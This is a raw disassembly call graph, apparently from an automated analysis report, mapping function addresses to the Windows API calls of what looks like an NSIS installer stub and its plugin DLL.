4501->4505 4503 402ba2 18 API calls 4502->4503 4504 402798 4503->4504 4506 40279f SetFilePointer 4504->4506 4506->4505 4507 4027af 4506->4507 4509 405f9c wsprintfW 4507->4509 4509->4505 4552 100027c7 4553 10002817 4552->4553 4554 100027d7 VirtualProtect 4552->4554 4554->4553 5120 401907 5121 402bbf 18 API calls 5120->5121 5122 40190e 5121->5122 5123 40579a MessageBoxIndirectW 5122->5123 5124 401917 5123->5124 5125 401e08 5126 402bbf 18 API calls 5125->5126 5127 401e0e 5126->5127 5128 402bbf 18 API calls 5127->5128 5129 401e17 5128->5129 5130 402bbf 18 API calls 5129->5130 5131 401e20 5130->5131 5132 402bbf 18 API calls 5131->5132 5133 401e29 5132->5133 5134 401423 25 API calls 5133->5134 5135 401e30 ShellExecuteW 5134->5135 5136 401e61 5135->5136 5142 40490a 5143 404936 5142->5143 5144 40491a 5142->5144 5145 404969 5143->5145 5146 40493c SHGetPathFromIDListW 5143->5146 5153 40577e GetDlgItemTextW 5144->5153 5148 40494c 5146->5148 5152 404953 SendMessageW 5146->5152 5150 40140b 2 API calls 5148->5150 5149 404927 SendMessageW 5149->5143 5150->5152 5152->5145 5153->5149 5154 1000164f 5155 10001516 GlobalFree 5154->5155 5158 10001667 5155->5158 5156 100016ad GlobalFree 5157 10001682 5157->5156 5158->5156 5158->5157 5159 10001699 VirtualFree 5158->5159 5159->5156 4677 402095 4678 402bbf 18 API calls 4677->4678 4679 40209c 4678->4679 4680 402bbf 18 API calls 4679->4680 4681 4020a6 4680->4681 4682 402bbf 18 API calls 4681->4682 4683 4020b0 4682->4683 4684 402bbf 18 API calls 4683->4684 4685 4020ba 4684->4685 4686 402bbf 18 API calls 4685->4686 4688 4020c4 4686->4688 4687 402103 CoCreateInstance 4692 402122 4687->4692 4688->4687 4689 402bbf 18 API calls 4688->4689 4689->4687 4690 401423 25 API calls 4691 4021e1 4690->4691 4692->4690 4692->4691 5160 401a15 5161 402bbf 18 API calls 5160->5161 5162 401a1e ExpandEnvironmentStringsW 5161->5162 5163 401a32 5162->5163 5165 401a45 5162->5165 5164 401a37 lstrcmpW 5163->5164 5163->5165 5164->5165 5166 402515 5167 402bbf 18 API calls 5166->5167 5168 40251c 5167->5168 5171 405c2a GetFileAttributesW CreateFileW 5168->5171 5170 402528 5171->5170 5172 401b16 5173 402bbf 18 API calls 5172->5173 5174 401b1d 5173->5174 5175 402ba2 18 API calls 5174->5175 5176 401b26 wsprintfW 5175->5176 5177 402a4c 5176->5177 5178 10001058 5180 10001074 5178->5180 5179 100010dd 5180->5179 5181 10001092 5180->5181 5182 10001516 GlobalFree 5180->5182 5183 10001516 GlobalFree 5181->5183 5182->5181 5184 100010a2 5183->5184 5185 100010b2 5184->5185 5186 100010a9 GlobalSize 5184->5186 5187 100010b6 GlobalAlloc 5185->5187 5188 100010c7 5185->5188 5186->5185 5189 1000153d 2 API calls 5187->5189 5190 100010d2 GlobalFree 5188->5190 5189->5188 5190->5179 4746 40159b 4747 402bbf 18 API calls 4746->4747 4748 4015a2 SetFileAttributesW 4747->4748 4749 4015b4 4748->4749 4758 40229d 4759 4022a5 4758->4759 4760 4022ab 4758->4760 4761 402bbf 18 API calls 4759->4761 4762 402bbf 18 API calls 4760->4762 4764 4022b9 4760->4764 4761->4760 4762->4764 4763 4022c7 4766 402bbf 18 API calls 4763->4766 4764->4763 4765 402bbf 18 API calls 4764->4765 4765->4763 4767 4022d0 WritePrivateProfileStringW 4766->4767 5191 401f1d 5192 402bbf 18 API calls 5191->5192 5193 401f24 5192->5193 5194 40642b 5 API calls 5193->5194 5195 401f33 5194->5195 5196 401f4f GlobalAlloc 5195->5196 5201 401fb7 5195->5201 5197 401f63 5196->5197 5196->5201 5198 40642b 5 API calls 5197->5198 5199 401f6a 5198->5199 5200 40642b 5 API calls 5199->5200 5202 401f74 5200->5202 5202->5201 5206 405f9c wsprintfW 5202->5206 5204 401fa9 5207 405f9c wsprintfW 5204->5207 5206->5204 5207->5201 5208 40149e 5209 402288 5208->5209 5210 4014ac PostQuitMessage 5208->5210 5210->5209 5211 40249e 5212 402cc9 19 API calls 5211->5212 5213 4024a8 5212->5213 5214 402ba2 18 API calls 5213->5214 5215 4024b1 5214->5215 5216 40281e 5215->5216 5217 4024d5 RegEnumValueW 5215->5217 5218 4024c9 RegEnumKeyW 5215->5218 5217->5216 5219 4024ee RegCloseKey 5217->5219 5218->5219 5219->5216 5221 40231f 5222 402324 5221->5222 5223 40234f 5221->5223 5224 402cc9 19 API calls 5222->5224 5225 402bbf 18 API calls 5223->5225 5226 40232b 5224->5226 5227 402356 5225->5227 5228 402bbf 18 API calls 5226->5228 5231 40236c 5226->5231 5232 402bff RegOpenKeyExW 5227->5232 5230 40233c RegDeleteValueW RegCloseKey 5228->5230 5230->5231 5233 402c76 5232->5233 5238 402c2a 5232->5238 5233->5231 5234 402c50 RegEnumKeyW 5235 402c62 RegCloseKey 5234->5235 5234->5238 5236 40642b 5 API calls 5235->5236 5239 402c72 5236->5239 5237 402c87 RegCloseKey 5237->5233 5238->5234 5238->5235 5238->5237 5240 402bff 5 API calls 5238->5240 5239->5233 5241 402ca2 RegDeleteKeyW 5239->5241 5240->5238 5241->5233 3707 4032a0 SetErrorMode GetVersion 3708 4032d4 3707->3708 3709 4032da 3707->3709 3710 40642b 5 API calls 3708->3710 3798 4063bf GetSystemDirectoryW 3709->3798 3710->3709 3712 4032f1 3713 4063bf 3 API calls 3712->3713 3714 4032fb 3713->3714 3715 4063bf 3 API calls 3714->3715 3716 403305 3715->3716 3801 40642b GetModuleHandleA 3716->3801 3719 40642b 5 API calls 3720 403313 #17 OleInitialize SHGetFileInfoW 3719->3720 3807 406055 lstrcpynW 3720->3807 3722 403350 GetCommandLineW 3808 406055 lstrcpynW 3722->3808 3724 403362 GetModuleHandleW 3725 40337a 3724->3725 3809 405a36 3725->3809 3728 4034b4 GetTempPathW 3813 40326f 3728->3813 3730 4034cc 3731 4034d0 GetWindowsDirectoryW lstrcatW 3730->3731 3732 403526 DeleteFileW 3730->3732 3736 40326f 12 API calls 3731->3736 3823 402dee GetTickCount GetModuleFileNameW 3732->3823 3733 405a36 CharNextW 3735 4033a2 3733->3735 3735->3733 3740 40349f 3735->3740 3742 40349d 3735->3742 3738 4034ec 3736->3738 3737 40353a 3746 405a36 CharNextW 3737->3746 3780 4035dd 3737->3780 3793 4035ed 3737->3793 3738->3732 3739 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3738->3739 3741 40326f 12 API calls 3739->3741 3907 406055 lstrcpynW 3740->3907 3744 40351e 3741->3744 3742->3728 3744->3732 3744->3793 3763 403559 3746->3763 3749 403728 3751 403730 GetCurrentProcess OpenProcessToken 3749->3751 3752 4037ac ExitProcess 3749->3752 3750 403608 3931 40579a 3750->3931 3754 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3751->3754 3755 40377c 3751->3755 3754->3755 3762 40642b 5 API calls 3755->3762 3757 4035b7 3908 405b11 3757->3908 3758 40361e 3935 40571d 3758->3935 3766 403783 3762->3766 3763->3757 3763->3758 3769 403798 ExitWindowsEx 3766->3769 3772 4037a5 3766->3772 3767 403634 lstrcatW 3768 40363f lstrcatW lstrcmpiW 3767->3768 3771 40365b 3768->3771 3768->3793 3769->3752 3769->3772 3774 403660 3771->3774 3775 403667 3771->3775 3973 40140b 3772->3973 3773 4035d2 3923 406055 lstrcpynW 3773->3923 3938 405683 CreateDirectoryW 3774->3938 3943 405700 CreateDirectoryW 3775->3943 3851 40389e 3780->3851 3782 40366c SetCurrentDirectoryW 3783 403687 3782->3783 3784 40367c 3782->3784 3947 406055 lstrcpynW 3783->3947 3946 406055 lstrcpynW 3784->3946 3789 4036d3 CopyFileW 3795 403695 3789->3795 3790 40371c 3792 405ef6 38 API calls 3790->3792 3792->3793 3924 4037c4 3793->3924 3794 406077 18 API calls 3794->3795 3795->3790 3795->3794 3797 403707 CloseHandle 3795->3797 3948 406077 3795->3948 3966 405ef6 MoveFileExW 3795->3966 3970 405735 CreateProcessW 3795->3970 3797->3795 3799 4063e1 wsprintfW LoadLibraryW 3798->3799 3799->3712 3802 406451 GetProcAddress 3801->3802 3803 406447 3801->3803 3805 40330c 3802->3805 3804 4063bf 3 API calls 3803->3804 3806 40644d 3804->3806 3805->3719 3806->3802 3806->3805 3807->3722 3808->3724 3810 405a3c 3809->3810 3811 403389 CharNextW 3810->3811 3812 405a43 CharNextW 3810->3812 3811->3728 3811->3735 3812->3810 3976 4062e9 3813->3976 3815 403285 3815->3730 3816 40327b 3816->3815 3985 405a09 lstrlenW CharPrevW 3816->3985 3819 405700 2 API calls 3820 403293 3819->3820 3988 405c59 3820->3988 3992 405c2a GetFileAttributesW CreateFileW 3823->3992 3825 402e2e 3849 402e3e 3825->3849 3993 406055 lstrcpynW 3825->3993 3827 402e54 3994 405a55 lstrlenW 3827->3994 3831 402e65 GetFileSize 3832 402f61 3831->3832 3850 402e7c 3831->3850 3999 402d8a 3832->3999 3834 402f6a 3836 402f9a GlobalAlloc 3834->3836 3834->3849 4034 403258 SetFilePointer 3834->4034 4010 403258 SetFilePointer 3836->4010 3838 402fcd 3842 402d8a 6 API calls 3838->3842 3840 402f83 3843 403242 ReadFile 3840->3843 3841 402fb5 4011 403027 3841->4011 3842->3849 3845 402f8e 3843->3845 3845->3836 3845->3849 3846 402d8a 6 API calls 3846->3850 3847 402fc1 3847->3847 3848 402ffe SetFilePointer 3847->3848 3847->3849 3848->3849 3849->3737 3850->3832 3850->3838 3850->3846 3850->3849 4031 403242 3850->4031 3852 40642b 5 API calls 3851->3852 3853 4038b2 3852->3853 3854 4038b8 GetUserDefaultUILanguage 3853->3854 3855 4038ca 3853->3855 4055 405f9c wsprintfW 3854->4055 4065 405f22 RegOpenKeyExW 3855->4065 3858 4038c8 4056 403b74 3858->4056 3860 403919 lstrcatW 3860->3858 3861 405f22 3 API calls 3861->3860 3864 405b11 18 API calls 3865 40394b 3864->3865 3866 4039df 3865->3866 3868 405f22 3 API calls 3865->3868 3867 405b11 18 API calls 3866->3867 3869 4039e5 3867->3869 3870 40397d 3868->3870 3871 4039f5 LoadImageW 3869->3871 3872 406077 18 API calls 3869->3872 3870->3866 3875 40399e lstrlenW 3870->3875 3878 405a36 CharNextW 3870->3878 3873 403a9b 3871->3873 3874 403a1c RegisterClassW 3871->3874 3872->3871 3877 40140b 2 API calls 3873->3877 3876 403a52 SystemParametersInfoW CreateWindowExW 3874->3876 3906 403aa5 3874->3906 3879 4039d2 3875->3879 3880 4039ac lstrcmpiW 3875->3880 3876->3873 3881 403aa1 3877->3881 3883 40399b 3878->3883 3882 405a09 3 API calls 3879->3882 3880->3879 3884 4039bc GetFileAttributesW 3880->3884 3885 403b74 19 API calls 3881->3885 3881->3906 3886 4039d8 3882->3886 3883->3875 3887 4039c8 3884->3887 3889 403ab2 3885->3889 4070 406055 lstrcpynW 3886->4070 3887->3879 3888 405a55 2 API calls 3887->3888 3888->3879 3891 403b41 3889->3891 3892 403abe ShowWindow 3889->3892 4071 405287 OleInitialize 3891->4071 3894 4063bf 3 API calls 3892->3894 3896 403ad6 3894->3896 3895 403b47 3897 403b63 3895->3897 3898 403b4b 3895->3898 3899 403ae4 GetClassInfoW 3896->3899 3901 4063bf 3 API calls 3896->3901 3900 40140b 2 API calls 3897->3900 3904 40140b 2 API calls 3898->3904 3898->3906 3902 403af8 GetClassInfoW RegisterClassW 3899->3902 3903 403b0e DialogBoxParamW 3899->3903 3900->3906 3901->3899 3902->3903 3905 40140b 2 API calls 3903->3905 3904->3906 3905->3906 3906->3793 3907->3742 4086 406055 lstrcpynW 3908->4086 3910 405b22 4087 405ab4 CharNextW CharNextW 3910->4087 3913 4035c3 3913->3793 3922 406055 lstrcpynW 3913->3922 3914 4062e9 5 API calls 3920 405b38 3914->3920 3915 405b69 lstrlenW 3916 405b74 3915->3916 3915->3920 3918 405a09 3 API calls 3916->3918 3919 405b79 GetFileAttributesW 3918->3919 3919->3913 3920->3913 3920->3915 3921 405a55 2 API calls 3920->3921 4093 406398 FindFirstFileW 3920->4093 3921->3915 3922->3773 3923->3780 3925 4037dc 3924->3925 3926 4037ce CloseHandle 3924->3926 4096 403809 3925->4096 3926->3925 3932 4057af 3931->3932 3933 403616 ExitProcess 3932->3933 3934 4057c3 MessageBoxIndirectW 3932->3934 3934->3933 3936 40642b 5 API calls 3935->3936 3937 403623 lstrcatW 3936->3937 3937->3767 3937->3768 3939 403665 3938->3939 3940 4056d4 GetLastError 3938->3940 3939->3782 3940->3939 3941 4056e3 SetFileSecurityW 3940->3941 3941->3939 3942 4056f9 GetLastError 3941->3942 3942->3939 3944 405710 3943->3944 3945 405714 GetLastError 3943->3945 3944->3782 3945->3944 3946->3783 3947->3795 3963 406084 3948->3963 3949 4062cf 3950 4036c6 DeleteFileW 3949->3950 4155 406055 lstrcpynW 3949->4155 3950->3789 3950->3795 3952 406137 GetVersion 3952->3963 3953 40629d lstrlenW 3953->3963 3954 406077 10 API calls 3954->3953 3957 4061b2 GetSystemDirectoryW 3957->3963 3958 405f22 3 API calls 3958->3963 3959 4061c5 GetWindowsDirectoryW 3959->3963 3960 4062e9 5 API calls 3960->3963 3961 406077 10 API calls 3961->3963 3962 40623e lstrcatW 3962->3963 3963->3949 3963->3952 3963->3953 3963->3954 3963->3957 3963->3958 3963->3959 3963->3960 3963->3961 3963->3962 3964 4061f9 SHGetSpecialFolderLocation 3963->3964 4153 405f9c wsprintfW 3963->4153 4154 406055 lstrcpynW 3963->4154 3964->3963 3965 406211 SHGetPathFromIDListW CoTaskMemFree 3964->3965 3965->3963 3967 405f17 3966->3967 3968 405f0a 3966->3968 3967->3795 4156 405d84 lstrcpyW 3968->4156 3971 405774 3970->3971 3972 405768 CloseHandle 3970->3972 3971->3795 3972->3971 3974 401389 2 API calls 3973->3974 3975 401420 3974->3975 3975->3752 3983 4062f6 3976->3983 3977 406371 CharPrevW 3980 40636c 3977->3980 3978 40635f CharNextW 3978->3980 3978->3983 3979 405a36 CharNextW 3979->3983 3980->3977 3981 406392 3980->3981 3981->3816 3982 40634b CharNextW 3982->3983 3983->3978 3983->3979 3983->3980 3983->3982 3984 40635a CharNextW 3983->3984 3984->3978 3986 40328d 3985->3986 3987 405a25 lstrcatW 3985->3987 3986->3819 3987->3986 3989 405c66 GetTickCount GetTempFileNameW 3988->3989 3990 40329e 3989->3990 3991 405c9c 3989->3991 3990->3730 3991->3989 3991->3990 3992->3825 3993->3827 3995 405a63 3994->3995 3996 402e5a 3995->3996 3997 405a69 CharPrevW 3995->3997 3998 406055 lstrcpynW 3996->3998 3997->3995 3997->3996 3998->3831 4000 402d93 3999->4000 4001 402dab 3999->4001 4004 402da3 4000->4004 4005 402d9c DestroyWindow 4000->4005 4002 402db3 4001->4002 4003 402dbb GetTickCount 4001->4003 4035 406467 4002->4035 4007 402dc9 CreateDialogParamW ShowWindow 4003->4007 4008 402dec 4003->4008 4004->3834 4005->4004 4007->4008 4008->3834 4010->3841 4012 403040 4011->4012 4013 40306e 4012->4013 4041 403258 SetFilePointer 4012->4041 4015 403242 ReadFile 4013->4015 4016 403079 4015->4016 4017 4031db 4016->4017 4018 40308b GetTickCount 4016->4018 4027 4031c5 4016->4027 4020 40321d 4017->4020 4021 4031df 4017->4021 4019 4030da 4018->4019 4018->4027 4022 403242 ReadFile 4019->4022 4026 403130 GetTickCount 4019->4026 4019->4027 4028 403155 MulDiv wsprintfW 4019->4028 4039 405cdc WriteFile 4019->4039 4023 403242 ReadFile 4020->4023 4024 403242 ReadFile 4021->4024 4025 405cdc WriteFile 4021->4025 4021->4027 4022->4019 4023->4027 4024->4021 4025->4021 4026->4019 4027->3847 4042 4051b4 4028->4042 4053 405cad ReadFile 4031->4053 4034->3840 4036 406484 PeekMessageW 4035->4036 4037 402db9 4036->4037 4038 40647a DispatchMessageW 4036->4038 4037->3834 4038->4036 4040 405cfa 4039->4040 4040->4019 4041->4013 4043 4051cf 4042->4043 4051 405271 4042->4051 4044 4051eb lstrlenW 4043->4044 4045 406077 18 API calls 4043->4045 4046 405214 4044->4046 4047 4051f9 lstrlenW 4044->4047 4045->4044 4049 405227 4046->4049 4050 40521a SetWindowTextW 4046->4050 4048 40520b lstrcatW 4047->4048 4047->4051 4048->4046 4049->4051 4052 40522d SendMessageW SendMessageW SendMessageW 4049->4052 4050->4049 4051->4019 4052->4051 4054 403255 4053->4054 4054->3850 4055->3858 4057 403b88 4056->4057 4078 405f9c wsprintfW 4057->4078 4059 403bf9 4060 406077 18 API calls 4059->4060 4061 403c05 SetWindowTextW 4060->4061 4062 403929 4061->4062 4063 403c21 4061->4063 4062->3864 4063->4062 4064 406077 18 API calls 4063->4064 4064->4063 4066 4038fa 4065->4066 4067 405f56 RegQueryValueExW 4065->4067 4066->3860 4066->3861 4068 405f77 RegCloseKey 4067->4068 4068->4066 4070->3866 4079 404165 4071->4079 4073 4052d1 4074 404165 SendMessageW 4073->4074 4075 4052e3 OleUninitialize 4074->4075 4075->3895 4076 4052aa 4076->4073 4082 401389 4076->4082 4078->4059 4080 40417d 4079->4080 4081 40416e SendMessageW 4079->4081 4080->4076 4081->4080 4083 401390 4082->4083 4084 4013fe 4083->4084 4085 4013cb MulDiv SendMessageW 4083->4085 4084->4076 4085->4083 4086->3910 4088 405ad1 4087->4088 4090 405ae3 4087->4090 4088->4090 4091 405ade CharNextW 4088->4091 4089 405b07 4089->3913 4089->3914 4090->4089 4092 405a36 CharNextW 4090->4092 4091->4089 4092->4090 4094 4063b9 4093->4094 4095 4063ae FindClose 4093->4095 4094->3920 4095->4094 4097 403817 4096->4097 4098 4037e1 4097->4098 4099 40381c FreeLibrary GlobalFree 4097->4099 4100 405846 4098->4100 4099->4098 4099->4099 4101 405b11 18 API calls 4100->4101 4102 405866 4101->4102 4103 405885 4102->4103 4104 40586e DeleteFileW 4102->4104 4106 4059b0 4103->4106 4140 406055 lstrcpynW 4103->4140 4105 4035f6 OleUninitialize 4104->4105 4105->3749 4105->3750 4106->4105 4113 406398 2 API calls 4106->4113 4108 4058ab 4109 4058b1 lstrcatW 4108->4109 4110 4058be 4108->4110 4111 4058c4 4109->4111 4112 405a55 2 API calls 4110->4112 4114 4058d4 lstrcatW 4111->4114 4115 4058ca 4111->4115 4112->4111 4116 4059ca 4113->4116 4117 4058df lstrlenW FindFirstFileW 4114->4117 4115->4114 4115->4117 4116->4105 4118 4059ce 4116->4118 4119 4059a5 4117->4119 4138 405901 4117->4138 4120 405a09 3 API calls 4118->4120 4119->4106 4121 4059d4 4120->4121 4122 4057fe 5 API calls 4121->4122 4125 4059e0 4122->4125 4124 405988 FindNextFileW 4126 40599e FindClose 4124->4126 4124->4138 4127 4059e4 4125->4127 4128 4059fa 4125->4128 4126->4119 4127->4105 4131 4051b4 25 API calls 4127->4131 4130 4051b4 25 API calls 4128->4130 4130->4105 4133 4059f1 4131->4133 4132 405846 62 API calls 4132->4138 4135 405ef6 38 API calls 4133->4135 4134 4051b4 25 API calls 4134->4124 4136 4059f8 4135->4136 4136->4105 4137 4051b4 25 API calls 4137->4138 4138->4124 4138->4132 4138->4134 4138->4137 4139 405ef6 38 API calls 4138->4139 4141 406055 lstrcpynW 4138->4141 4142 4057fe 4138->4142 4139->4138 4140->4108 4141->4138 4150 405c05 GetFileAttributesW 4142->4150 4145 40582b 4145->4138 4146 405821 DeleteFileW 4148 405827 4146->4148 4147 405819 RemoveDirectoryW 4147->4148 4148->4145 4149 405837 SetFileAttributesW 4148->4149 4149->4145 4151 40580a 4150->4151 4152 405c17 SetFileAttributesW 4150->4152 4151->4145 4151->4146 4151->4147 4152->4151 4153->3963 4154->3963 4155->3950 4157 405dd2 GetShortPathNameW 4156->4157 4158 405dac 4156->4158 4159 405ef1 4157->4159 4160 405de7 4157->4160 4183 405c2a GetFileAttributesW CreateFileW 4158->4183 4159->3967 4160->4159 4163 405def wsprintfA 4160->4163 4162 405db6 CloseHandle GetShortPathNameW 4162->4159 4164 405dca 4162->4164 4165 406077 18 API calls 4163->4165 4164->4157 4164->4159 4166 405e17 4165->4166 4184 405c2a GetFileAttributesW CreateFileW 4166->4184 4168 405e24 4168->4159 4169 405e33 GetFileSize GlobalAlloc 4168->4169 4170 405e55 4169->4170 4171 405eea CloseHandle 4169->4171 4172 405cad ReadFile 4170->4172 4171->4159 4173 405e5d 4172->4173 4173->4171 4185 405b8f lstrlenA 4173->4185 4176 405e74 lstrcpyA 4178 405e96 4176->4178 4177 405e88 4179 405b8f 4 API calls 4177->4179 4180 405ecd SetFilePointer 4178->4180 4179->4178 4181 405cdc WriteFile 4180->4181 4182 405ee3 GlobalFree 4181->4182 4182->4171 4183->4162 4184->4168 4186 405bd0 lstrlenA 4185->4186 4187 405bd8 4186->4187 4188 405ba9 lstrcmpiA 4186->4188 4187->4176 4187->4177 4188->4187 4189 405bc7 CharNextA 4188->4189 4189->4186 5242 100010e1 5251 10001111 5242->5251 5243 100011d8 GlobalFree 5244 100012ba 2 API calls 5244->5251 5245 100011d3 5245->5243 5246 100011f8 GlobalFree 5246->5251 5247 10001272 2 API calls 5250 100011c4 GlobalFree 5247->5250 5248 10001164 GlobalAlloc 5248->5251 5249 100012e1 lstrcpyW 5249->5251 5250->5251 5251->5243 5251->5244 5251->5245 5251->5246 5251->5247 5251->5248 5251->5249 5251->5250 5252 401ca3 5253 402ba2 18 API calls 5252->5253 5254 401ca9 IsWindow 5253->5254 5255 401a05 5254->5255 5256 402a27 SendMessageW 5257 402a41 InvalidateRect 5256->5257 5258 402a4c 5256->5258 5257->5258 4555 405128 4556 405138 4555->4556 4557 40514c 4555->4557 4558 405195 4556->4558 4559 40513e 4556->4559 4560 405154 IsWindowVisible 4557->4560 4566 405174 4557->4566 4561 40519a CallWindowProcW 4558->4561 4562 404165 SendMessageW 4559->4562 4560->4558 4563 405161 4560->4563 4564 405148 4561->4564 4562->4564 4569 404a7e SendMessageW 4563->4569 4566->4561 4574 404afe 4566->4574 4570 404aa1 GetMessagePos ScreenToClient SendMessageW 4569->4570 4571 404add SendMessageW 4569->4571 4572 404ad5 4570->4572 4573 404ada 4570->4573 4571->4572 4572->4566 4573->4571 4583 406055 lstrcpynW 4574->4583 4576 404b11 4584 405f9c wsprintfW 4576->4584 4578 404b1b 4579 40140b 2 API calls 4578->4579 4580 404b24 4579->4580 4585 406055 lstrcpynW 4580->4585 4582 404b2b 4582->4558 4583->4576 4584->4578 4585->4582 4586 40242a 4597 402cc9 4586->4597 4588 402434 4589 402bbf 18 API calls 4588->4589 4590 40243d 4589->4590 4591 402448 RegQueryValueExW 4590->4591 4596 40281e 4590->4596 4592 40246e RegCloseKey 4591->4592 4593 402468 4591->4593 4592->4596 4593->4592 4601 405f9c wsprintfW 4593->4601 4598 402bbf 18 API calls 4597->4598 4599 402ce2 4598->4599 4600 402cf0 RegOpenKeyExW 4599->4600 4600->4588 4601->4592 5259 40422d lstrcpynW lstrlenW 5260 40172d 5261 402bbf 18 API calls 5260->5261 5262 401734 SearchPathW 5261->5262 5263 40174f 5262->5263 4602 404b30 GetDlgItem GetDlgItem 4603 404b82 7 API calls 4602->4603 4611 404d9b 4602->4611 4604 404c25 DeleteObject 4603->4604 4605 404c18 SendMessageW 4603->4605 4606 404c2e 4604->4606 4605->4604 4607 404c3d 4606->4607 4608 404c65 4606->4608 4609 406077 18 API calls 4607->4609 4612 404119 19 API calls 4608->4612 4615 404c47 SendMessageW SendMessageW 4609->4615 4610 404e60 4614 404e7f 4610->4614 4622 404e71 SendMessageW 4610->4622 4611->4610 4611->4614 4618 404dfb 4611->4618 4619 404c79 4612->4619 4613 404f2b 4616 404f35 SendMessageW 4613->4616 4617 404f3d 4613->4617 4614->4613 4620 405113 4614->4620 4625 404ed8 SendMessageW 4614->4625 4615->4606 4616->4617 4627 404f56 4617->4627 4628 404f4f ImageList_Destroy 4617->4628 4640 404f66 4617->4640 4623 404a7e 5 API calls 4618->4623 4624 404119 19 API calls 4619->4624 4621 404180 8 API calls 4620->4621 4626 405121 4621->4626 4622->4614 4638 404e0c 4623->4638 4639 404c87 4624->4639 4625->4620 4630 404eed SendMessageW 4625->4630 4631 404f5f GlobalFree 4627->4631 4627->4640 4628->4627 4629 4050d5 4629->4620 4634 4050e7 ShowWindow GetDlgItem ShowWindow 4629->4634 4633 404f00 4630->4633 4631->4640 4632 404d5c GetWindowLongW SetWindowLongW 4635 404d75 4632->4635 4641 404f11 SendMessageW 4633->4641 4634->4620 4636 404d93 4635->4636 4637 404d7b ShowWindow 4635->4637 4659 40414e SendMessageW 4636->4659 4658 40414e SendMessageW 4637->4658 4638->4610 4639->4632 4642 404d56 4639->4642 4645 404cd7 SendMessageW 4639->4645 4646 404d13 SendMessageW 4639->4646 4647 404d24 SendMessageW 4639->4647 4640->4629 4648 404afe 4 API calls 4640->4648 4652 404fa1 4640->4652 4641->4613 4642->4632 4642->4635 4645->4639 4646->4639 4647->4639 4648->4652 4649 404d8e 4649->4620 4650 4050ab InvalidateRect 4650->4629 4651 4050c1 4650->4651 4660 404a39 4651->4660 4653 404fcf SendMessageW 4652->4653 4654 404fe5 4652->4654 4653->4654 4654->4650 4655 405046 4654->4655 4657 405059 SendMessageW SendMessageW 4654->4657 4655->4657 4657->4654 4658->4649 4659->4611 4663 404970 4660->4663 4662 404a4e 4662->4629 4666 404989 4663->4666 4664 406077 18 API calls 4665 4049ed 4664->4665 4667 406077 18 API calls 4665->4667 4666->4664 4668 4049f8 4667->4668 4669 406077 18 API calls 4668->4669 4670 404a0e lstrlenW wsprintfW SetDlgItemTextW 4669->4670 4670->4662 5264 4045b4 5265 4045e0 5264->5265 5266 4045f1 5264->5266 5325 40577e GetDlgItemTextW 5265->5325 5268 4045fd GetDlgItem 5266->5268 5273 40465c 5266->5273 5270 404611 5268->5270 5269 4045eb 5272 4062e9 5 API calls 5269->5272 5275 404625 SetWindowTextW 5270->5275 5280 405ab4 4 API calls 5270->5280 5271 404740 5323 4048ef 5271->5323 5327 40577e GetDlgItemTextW 5271->5327 5272->5266 5273->5271 5276 406077 18 API calls 5273->5276 5273->5323 5278 404119 19 API calls 5275->5278 5281 4046d0 SHBrowseForFolderW 5276->5281 5277 404770 5282 405b11 18 API calls 5277->5282 5283 404641 5278->5283 5279 404180 8 API calls 5284 404903 5279->5284 5285 40461b 5280->5285 5281->5271 5286 4046e8 CoTaskMemFree 5281->5286 5287 404776 5282->5287 5288 404119 19 API calls 5283->5288 5285->5275 5291 405a09 3 API calls 5285->5291 5289 405a09 3 API calls 5286->5289 5328 406055 lstrcpynW 5287->5328 5290 40464f 5288->5290 5292 4046f5 5289->5292 5326 40414e SendMessageW 5290->5326 5291->5275 5295 40472c SetDlgItemTextW 5292->5295 5300 406077 18 API calls 5292->5300 5295->5271 5296 404655 5298 40642b 5 API calls 5296->5298 5297 40478d 5299 40642b 5 API calls 5297->5299 5298->5273 5308 404794 5299->5308 5301 404714 lstrcmpiW 5300->5301 5301->5295 5304 404725 lstrcatW 5301->5304 5302 4047d5 5329 406055 lstrcpynW 5302->5329 5304->5295 5305 4047dc 5306 405ab4 4 API calls 5305->5306 5307 4047e2 GetDiskFreeSpaceW 5306->5307 5311 404806 MulDiv 5307->5311 5312 40482d 5307->5312 5308->5302 5310 405a55 2 API calls 5308->5310 5308->5312 5310->5308 5311->5312 5313 40489e 5312->5313 5314 404a39 21 API calls 5312->5314 5315 4048c1 5313->5315 5317 40140b 2 API calls 5313->5317 5316 40488b 5314->5316 5330 40413b EnableWindow 5315->5330 5319 4048a0 SetDlgItemTextW 5316->5319 5320 404890 5316->5320 5317->5315 5319->5313 5322 404970 21 API calls 5320->5322 5321 4048dd 5321->5323 5331 404549 5321->5331 5322->5313 5323->5279 5325->5269 5326->5296 5327->5277 5328->5297 5329->5305 5330->5321 5332 404557 5331->5332 5333 40455c SendMessageW 5331->5333 5332->5333 5333->5323 5334 4027b4 5335 4027ba 5334->5335 5336 4027c2 FindClose 5335->5336 5337 402a4c 5335->5337 5336->5337 5338 4042b6 5339 4042ce 5338->5339 5341 4043e8 5338->5341 5344 404119 19 API calls 5339->5344 5340 404452 5342 404524 5340->5342 5343 40445c GetDlgItem 5340->5343 5341->5340 5341->5342 5347 404423 GetDlgItem SendMessageW 5341->5347 5349 404180 8 API calls 5342->5349 5345 4044e5 5343->5345 5346 404476 5343->5346 5348 404335 5344->5348 5345->5342 5351 4044f7 5345->5351 5346->5345 5350 40449c 6 API calls 5346->5350 5369 40413b EnableWindow 5347->5369 5353 404119 19 API calls 5348->5353 5359 40451f 5349->5359 5350->5345 5354 40450d 5351->5354 5355 4044fd SendMessageW 5351->5355 5357 404342 CheckDlgButton 5353->5357 5358 404513 SendMessageW 5354->5358 5354->5359 5355->5354 5356 40444d 5360 404549 SendMessageW 5356->5360 5367 40413b EnableWindow 5357->5367 5358->5359 5360->5340 5362 404360 GetDlgItem 5368 40414e SendMessageW 5362->5368 5364 404376 SendMessageW 5365 404393 GetSysColor 5364->5365 5366 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5364->5366 5365->5366 5366->5359 5367->5362 5368->5364 5369->5356 5370 401b37 5371 401b88 5370->5371 5376 401b44 5370->5376 5372 401bb2 GlobalAlloc 5371->5372 5373 401b8d 5371->5373 5374 406077 18 API calls 5372->5374 5385 402288 5373->5385 5391 406055 lstrcpynW 5373->5391 5378 401bcd 5374->5378 5375 406077 18 API calls 5379 402282 5375->5379 5376->5378 5380 401b5b 5376->5380 5378->5375 5378->5385 5383 40579a MessageBoxIndirectW 5379->5383 5389 406055 lstrcpynW 5380->5389 5381 401b9f GlobalFree 5381->5385 5383->5385 5384 401b6a 5390 406055 